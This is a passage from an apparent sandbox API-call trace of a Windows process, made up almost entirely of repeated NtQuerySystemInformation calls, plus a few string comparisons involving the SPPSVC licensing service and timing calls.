(SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0230.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0230.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0230.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0230.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0230.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0230.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0230.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0230.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0230.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0230.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0230.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0230.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0230.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0230.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0230.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0230.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0230.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0230.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0230.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.967] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd408, Length=0x50, ResultLength=0x0) [0230.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x38, ResultLength=0x0) [0230.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0230.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0230.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0230.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x28, ResultLength=0x0) [0230.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x38, ResultLength=0x0) [0230.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x28, ResultLength=0x0) [0230.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x28, ResultLength=0x0) [0230.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x38, ResultLength=0x0) [0230.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0230.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0230.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0230.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0230.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x38, ResultLength=0x0) [0230.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0230.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0230.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0230.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd718, Length=0x50, ResultLength=0x0) [0230.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x28, ResultLength=0x0) [0230.974] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd718, Length=0x50, ResultLength=0x0) [0230.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd718, Length=0x50, ResultLength=0x0) [0230.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x50, ResultLength=0x0) [0230.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd580, Length=0x28, ResultLength=0x0) [0230.975] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x50, ResultLength=0x0) [0230.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x50, ResultLength=0x0) [0230.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x50, ResultLength=0x0) [0230.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x38, ResultLength=0x0) [0230.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x28, ResultLength=0x0) [0230.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x28, ResultLength=0x0) [0230.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x28, ResultLength=0x0) [0230.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x28, ResultLength=0x0) [0230.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x38, ResultLength=0x0) [0230.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd450, Length=0x28, ResultLength=0x0) [0230.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd450, Length=0x28, ResultLength=0x0) [0230.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x38, ResultLength=0x0) [0230.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0230.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x20, ResultLength=0x0) [0230.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x20, ResultLength=0x0) [0230.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x20, ResultLength=0x0) [0230.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x38, ResultLength=0x0) [0230.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0230.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0230.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0230.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.994] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc7520fd660 | out: lpSystemTimeAsFileTime=0xc7520fd660*(dwLowDateTime=0xeaf619dd, dwHighDateTime=0x1d5fb6e)) [0230.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd718, Length=0x50, ResultLength=0x0) [0230.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd650, Length=0x28, ResultLength=0x0) [0230.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd568, Length=0x50, ResultLength=0x0) [0230.994] GetTickCount () returned 0x117a4be [0230.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd438, Length=0x58, ResultLength=0x0) [0230.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0230.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0230.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0230.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0230.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0230.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0230.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0230.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0230.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0231.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0231.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0231.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0231.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0231.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0231.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0231.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd438, Length=0x58, ResultLength=0x0) [0231.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, 